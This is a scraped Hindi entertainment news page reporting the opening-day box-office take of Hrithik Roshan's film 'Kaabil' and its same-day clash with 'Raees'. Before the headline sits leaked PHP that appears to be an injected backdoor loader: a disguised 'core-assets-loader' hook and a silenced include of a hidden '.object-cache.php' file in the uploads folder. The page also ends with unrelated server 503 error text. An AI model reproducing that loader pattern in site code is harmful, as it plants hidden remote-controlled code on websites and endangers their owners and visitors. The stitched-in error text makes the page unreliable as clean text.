add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); ऋतिक रोशन की ‘काबिल’ ने पहले दिन कमाएं 10 करोड़ रुपए – SOCH INDIA
Menu

मनोरंजन
ऋतिक रोशन की ‘काबिल’ ने पहले दिन कमाएं 10 करोड़ रुपए

nobanner

बॉलीवुड के सुपरस्टार ऋतिक रोशन की मोस्ट अवेटेड फिल्म ”काबिल” बुधवार को सिल्वर स्क्रिन पर रिलीज हो गई. डायरेक्टर संजय गुप्ता के निर्देशन और राकेश रोशन के प्रोडक्शन में बनी इस फिल्म ने पहले ही दिन बॉक्स ऑफिस पर 10 करोड़ रुपए का कारोबार किया.

फिल्म ट्रेड एनालिस्ट तरण आदर्श के मुताबिक ऋतिक रोशन और यामी गौतम स्टारर ”काबिल” ने ओपनिंग डे पर 10.43 करोड़ रुपए की शानदार कमाई की. तरण आदर्श की मानें तो यह फिल्म गुरुवर को गणतंत्र दिवस के मौके पर बॉक्स ऑफिस पर धमाल मचाने के साथ ही वीकेंड पर धमाकेदार प्रदर्शन करेगी.

मूवी रिव्यू: जानें, कैसी है ऋतिक-यामी की ‘काबिल’?

बुधवार को इस साल की दो बड़ी फिल्में रिलीज हुई हैं. शाहरुख खान की ‘रईस’ और ऋतिक रोशन की ‘काबिल’. एक ही दिन दो बड़ी फिल्में रिलीज होने से दोनों अभिनेता परेशान है कि कहीं एक फिल्म की वजह से दूसरे के कारोबार को नुकसान न पहुंचे. ऐसे में सारा दारोमदार फिल्म की कहानी और उसके कंटेंट पर है.

साल की शुरुआत में बॉलीवुड के दो दिग्गजों की फिल्म एक ही दिन रिलीज होने से दर्शकों के सामने बड़ी उलझन है. अगर किसी को एक ही फिल्म देखनी है तो वो कौन सी देखें इसका चुनाव बड़ा मुश्किल है. या फिर दोनों की फिल्में देखनी चाहिए. इसे लेकर दर्शक जवाब खोज रहे हैं.

अगर बात ‘काबिल’ की कि जाए तो फिल्म में अभिनेता ऋतिक रोशन और अभिनेत्री यामी गौतम दृष्टिहीन के किरदार में हैं. फिल्म में ऋतिक ने दृष्टिहीन के किरदार में जान डाल दी है.

एबीपी न्यूज़ संवाददाता जोइता मित्रा ने सुपरस्टार ऋतिक रोशन की फिल्म ‘काबिल’ देखी है. जोइता ने बताया कि ऋतिक के लिए ये फिल्म इसलिए अहम हैं क्योंकि उनकी पिछली बिग बजट फिल्म ‘मोहेनजोदारो’ नहीं चल पाई थी. और इस बार भी टक्कर सीधे शाहरुख खान से है

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.